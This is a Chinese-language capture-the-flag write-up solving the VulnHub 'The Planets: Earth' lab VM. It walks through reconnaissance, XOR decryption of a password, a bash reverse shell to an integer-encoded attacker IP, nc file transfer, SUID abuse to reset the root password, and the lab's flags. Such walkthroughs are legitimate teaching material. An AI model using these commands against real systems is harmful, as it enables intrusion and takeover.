vulnhub刷題記錄(The Planets: Earth)

語言: CN / TW / HK
  • 英文名稱 :The Planets: Earth
  • 中文名稱 :行星:地球
  • 釋出日期 :2021 年 11 月 2 日
  • 難度 :簡單
  • 描述 :地球是一個簡單的盒子,儘管您可能會發現它比本系列中的“水星”更具挑戰性,並且根據您的經驗,在簡單的更難的一面。盒子上有兩個標誌:一個使用者標誌和一個包含 md5 雜湊的根標誌。這已經在 VirtualBox 上進行了測試,因此在 VMware 上可能無法正常工作。如有任何問題/問題或反饋,請傳送電子郵件至: http:// protonmail.com 上的 SirFlash,儘管我可能需要一段時間才能回覆您。
  • 下載地址https://www.vulnhub.com/entry/the-planets-earth,755/

1、嘗試發現IP地址,發現1個可疑IP

  • earth.lan (192.168.199.179)
└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds

2、嘗試對IP地址進行埠掃描,開放了22埠、80埠、443埠

$ nmap -A 192.168.199.179        
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time

3、準備對該網站進行頁面暴力破解,需要先配置hosts檔案

192.168.199.179 terratest.earth.local
192.168.199.179 earth.local

4、爆破結果如下,80埠有web後臺,443埠有web首頁和robots檔案

---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)     

+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                  
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

5、訪問web頁面,在robots.txt中尋找到 testingnotes.* 訪問路徑

首頁
後臺
robot.txt

6、順著提示,進入testingnotes.txt 頁面,得到2條線索

  • 金鑰線索:testdata.txt
  • 使用者名稱線索:terra
線索頁面
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

測試安全訊息系統注意事項:
*使用 XOR 加密作為演算法,在 RSA 中使用應該是安全的。
*地球已確認他們已收到我們傳送的訊息。
*testdata.txt 用於測試加密。
*terra 用作管理門戶的使用者名稱。
去做:
*我們如何安全地將我們的每月金鑰傳送到地球? 還是我們應該每週更換金鑰?
*需要測試不同的金鑰長度以防止暴力破解。 鑰匙應該多長?
*需要改進訊息介面和管理面板的介面,目前非常基礎。

7、順著線索,繼續找

線索頁面
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根據輻射測年估計和其他證據,地球形成於 45 億年前。
在地球歷史的最初十億年中,生命出現在海洋中並開始影響地球的大氣和地表,導致厭氧生物和後來的需氧生物的擴散。
一些地質證據表明,生命可能早在 41 億年前就已經出現。

8、在首頁中發現,3段密文,需要根據上面的提示,計算出對應的明文

首頁中的3段密文
Previous Messages: 
    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

9、對首頁中的3段訊息,進行xor 解碼,得到提示:earthclimatechangebad4humans

b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat'

解碼程式碼參考:

import binascii
import base64
data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
s1 = (hex(int(data1,16) ^ int(f,16)))
t1 = base64.b16decode(str(s1[2:]).upper())
s2 = (hex(int(data2,16) ^ int(f,16)))
t2 = base64.b16decode(str(s2[2:]).upper())
s3 = (hex(int(data3,16) ^ int(f,16)))
t3 = base64.b16decode(str(s3[2:]).upper())
print(t1)
print(t2)
print(t3)

10、拿著使用者名稱+密碼,成功登入測試頁面,發現竟然是一個命令執行

測試後臺頁面

11、嘗試通過nc反彈shell

攻擊機:
nc -lvnp 4444
靶機:
bash -i >& /dev/tcp/3232286711/4444 0>&1

其中:3232286711 為 IP地址的整形轉換,可參考程式碼:

import socket
import struct
ip = "192.168.199.247"
int_ip = socket.ntohl(struct.unpack("I",socket.inet_aton(str(ip)))[0])
print(int_ip)

成功拿到shell

反彈shell成功

12、嘗試查詢flag

find / -name "*flag*" 2>/dev/null
查詢flag檔案位置

得到flag潛藏的位置:

/var/earth_web/user_flag.txt

檢視flag內容:

cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

13、繼續尋找root使用者的flag,查詢具有suid許可權的檔案

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

執行/usr/bin/reset_root

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

檢查是否存在復位觸發器...
重置失敗,所有觸發器都不存在。

14、將reset_root檔案發回本地跟蹤執行,這裡使用nc檔案傳輸功能

攻擊機:
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332

靶機:
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root
nc 192.168.199.247 5555 < /usr/bin/reset_root

15、在本地進行除錯,發現缺少3個資料夾

  • /dev/shm/kHgTFI5G
  • /dev/shm/Zw7bV9U5
  • /tmp/kcM0Wewe
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root          
zsh: 許可權不夠: ./reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root 
-rw-r--r-- 1 root root 24K  8月 20 15:20 reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root   
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root       
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 沒有那個檔案或目錄
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL)                               = 0x7bd000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (沒有那個檔案或目錄)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631)           = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x7bd000
brk(0x7de000)                           = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (沒有那個檔案或目錄)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (沒有那個檔案或目錄)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (沒有那個檔案或目錄)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

於是建立資料夾

bash-5.1$ mkdir dev/shm/kHgTFI5G
mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe
mkdir /tmp/kcM0Wewe

16、再次嘗試重置root密碼

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

檢查是否存在復位觸發器...
存在重置觸發器,正在將根密碼重置為:地球

得到root密碼:Earth

17、切換到root使用者,再次搜尋flag

su -u root
切換到root
cat /root/root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

到此,實驗完成~